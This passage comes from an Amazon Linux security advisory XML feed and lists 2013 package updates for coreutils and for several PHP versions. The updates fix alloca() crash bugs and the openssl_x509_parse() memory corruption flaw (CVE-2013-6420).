arch="x86_64"><filename>Packages/xorg-x11-server-Xephyr-1.13.0-23.0.23.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.13.0" release="23.0.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-debuginfo-1.13.0-23.0.23.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-common" version="1.13.0" release="23.0.23.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-common-1.13.0-23.0.23.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.13.0" release="23.0.23.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xephyr-1.13.0-23.0.23.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.13.0" release="23.0.23.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xnest-1.13.0-23.0.23.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.13.0" release="23.0.23.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xvfb-1.13.0-23.0.23.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.13.0" release="23.0.23.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-debuginfo-1.13.0-23.0.23.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-261</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-261: low priority package update for coreutils</title><issued date="2013-12-11 20:34:00" /><updated date="2014-09-16 22:10:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-0223:
It was discovered that the sort, uniq, and join utilities did not properly restrict the use of the alloca() function. An attacker could use this flaw to crash those utilities by providing long input strings.
CVE-2013-0222:
It was discovered that the sort, uniq, and join utilities did not properly restrict the use of the alloca() function. An attacker could use this flaw to crash those utilities by providing long input strings.
CVE-2013-0221:
It was discovered that the sort, uniq, and join utilities did not properly restrict the use of the alloca() function. An attacker could use this flaw to crash those utilities by providing long input strings.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0221" title="" id="CVE-2013-0221" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0222" title="" id="CVE-2013-0222" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0223" title="" id="CVE-2013-0223" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1652.html" title="" id="RHSA-2013:1652" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="coreutils-libs" version="8.4" release="31.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/coreutils-libs-8.4-31.17.amzn1.x86_64.rpm</filename></package><package name="coreutils" version="8.4" release="31.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/coreutils-8.4-31.17.amzn1.x86_64.rpm</filename></package><package name="coreutils-debuginfo" version="8.4" release="31.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/coreutils-debuginfo-8.4-31.17.amzn1.x86_64.rpm</filename></package><package name="coreutils-libs" version="8.4" release="31.17.amzn1" epoch="0" arch="i686"><filename>Packages/coreutils-libs-8.4-31.17.amzn1.i686.rpm</filename></package><package name="coreutils" version="8.4" release="31.17.amzn1" epoch="0" arch="i686"><filename>Packages/coreutils-8.4-31.17.amzn1.i686.rpm</filename></package><package name="coreutils-debuginfo" version="8.4" release="31.17.amzn1" epoch="0" arch="i686"><filename>Packages/coreutils-debuginfo-8.4-31.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-262</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-262: critical priority package update for php</title><issued date="2013-12-17 21:29:00" /><updated date="2014-09-16 22:11:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-6420:
A memory corruption flaw was found in the way the openssl_x509_parse() function of the PHP openssl extension parsed X.509 certificates. A remote attacker could use this flaw to provide a malicious self-signed certificate or a certificate signed by a trusted authority to a PHP application using the aforementioned function, causing the application to crash or, possibly, allow the attacker to execute arbitrary code with the privileges of the user running the PHP interpreter.
1036830:
CVE-2013-6420 php: memory corruption in openssl_x509_parse()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6420" title="" id="CVE-2013-6420" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php-common" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-common-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-mssql" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mssql-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-mysql" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mysql-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-soap" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-soap-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-odbc" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-odbc-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-recode" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-recode-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-mysqlnd" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mysqlnd-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-xmlrpc" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-xmlrpc-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-embedded" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-embedded-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-enchant" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-enchant-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-dba" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-dba-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-cli" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-cli-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-snmp" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-snmp-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-mcrypt" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mcrypt-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-pgsql" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pgsql-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-imap" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-imap-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-pspell" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pspell-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-bcmath" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-bcmath-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-devel" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-devel-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-fpm" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-fpm-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-ldap" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-ldap-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-mbstring" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mbstring-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-gd" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-gd-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-xml" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-xml-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-debuginfo" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-debuginfo-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-tidy" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-tidy-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-pdo" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pdo-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-intl" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-intl-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-process" version="5.3.28" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-process-5.3.28-1.2.amzn1.x86_64.rpm</filename></package><package name="php-mysqlnd" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-mysqlnd-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-snmp" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-snmp-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-debuginfo" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-debuginfo-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-common" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-common-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-imap" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-imap-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-fpm" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-fpm-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-enchant" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-enchant-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-mcrypt" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-mcrypt-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-mbstring" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-mbstring-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-dba" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-dba-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-odbc" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-odbc-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-ldap" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-ldap-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-pgsql" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-pgsql-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-soap" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-soap-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-recode" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-recode-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-mysql" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-mysql-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-xml" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-xml-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-pspell" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-pspell-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-mssql" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-mssql-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-bcmath" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-bcmath-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-cli" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-cli-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-process" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-process-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-embedded" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-embedded-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-pdo" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-pdo-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-intl" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-intl-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-xmlrpc" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-xmlrpc-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-gd" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-gd-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-tidy" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-tidy-5.3.28-1.2.amzn1.i686.rpm</filename></package><package name="php-devel" version="5.3.28" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/php-devel-5.3.28-1.2.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-263</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-263: critical priority package update for php54</title><issued date="2013-12-17 21:29:00" /><updated date="2014-09-16 22:11:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-6420:
A memory corruption flaw was found in the way the openssl_x509_parse() function of the PHP openssl extension parsed X.509 certificates. A remote attacker could use this flaw to provide a malicious self-signed certificate or a certificate signed by a trusted authority to a PHP application using the aforementioned function, causing the application to crash or, possibly, allow the attacker to execute arbitrary code with the privileges of the user running the PHP interpreter.
1036830:
CVE-2013-6420 php: memory corruption in openssl_x509_parse()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6420" title="" id="CVE-2013-6420" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php54-xml" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xml-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-xmlrpc" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xmlrpc-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-gd" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-gd-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-recode" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-recode-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-pgsql" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pgsql-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-mssql" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mssql-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-mcrypt" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mcrypt-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-odbc" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-odbc-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-fpm" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-fpm-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-pspell" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pspell-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-soap" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-soap-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-enchant" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-enchant-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-common" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-common-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-bcmath" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-bcmath-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-cli" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-cli-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-snmp" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-snmp-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-pdo" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pdo-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-mysql" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysql-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-embedded" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-embedded-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-intl" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-intl-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-process" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-process-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-imap" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-imap-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-ldap" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-ldap-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-tidy" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-tidy-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-devel" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-devel-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-dba" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-dba-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-debuginfo" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-debuginfo-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-mysqlnd" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysqlnd-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-mbstring" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mbstring-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-recode" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-recode-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-mysqlnd" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysqlnd-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-enchant" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-enchant-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-common" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-common-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-xml" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xml-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-imap" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-imap-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-tidy" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-tidy-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-process" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-process-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-snmp" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-snmp-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-gd" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-gd-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-soap" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-soap-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-mssql" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mssql-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-embedded" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-embedded-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-ldap" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-ldap-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-pgsql" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pgsql-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-fpm" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-fpm-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-odbc" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-odbc-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-pspell" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pspell-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-devel" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-devel-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-intl" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-intl-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-pdo" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pdo-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-cli" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-cli-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-mbstring" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mbstring-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-mcrypt" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mcrypt-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-xmlrpc" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xmlrpc-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-dba" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-dba-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-bcmath" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-bcmath-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-mysql" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysql-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-debuginfo" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-debuginfo-5.4.23-1.49.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-264</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-264: critical priority package update for php55</title><issued date="2013-12-17 21:29:00" /><updated date="2014-09-16 22:11:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-6420:
A memory corruption flaw was found in the way the openssl_x509_parse() function of the PHP openssl extension parsed X.509 certificates. A remote attacker could use this flaw to provide a malicious self-signed certificate or a certificate signed by a trusted authority to a PHP application using the aforementioned function, causing the application to crash or, possibly, allow the attacker to execute arbitrary code with the privileges of the user running the PHP interpreter.
1036830:
CVE-2013-6420 php: memory corruption in openssl_x509_parse()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6420" title="" id="CVE-2013-6420" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55-cli" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-cli-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-gd" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gd-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-recode" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-recode-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-fpm" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-fpm-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-mssql" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mssql-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-dba" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-dba-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-soap" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-soap-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-snmp" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-snmp-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-embedded-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-imap-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-opcache" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-opcache-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-mcrypt" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mcrypt-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-pspell" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pspell-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-xml" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xml-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-pgsql" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pgsql-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-intl" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-intl-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-gmp" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gmp-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-process" version="5.5.7" release="1.61.amzn1" epoch="0" 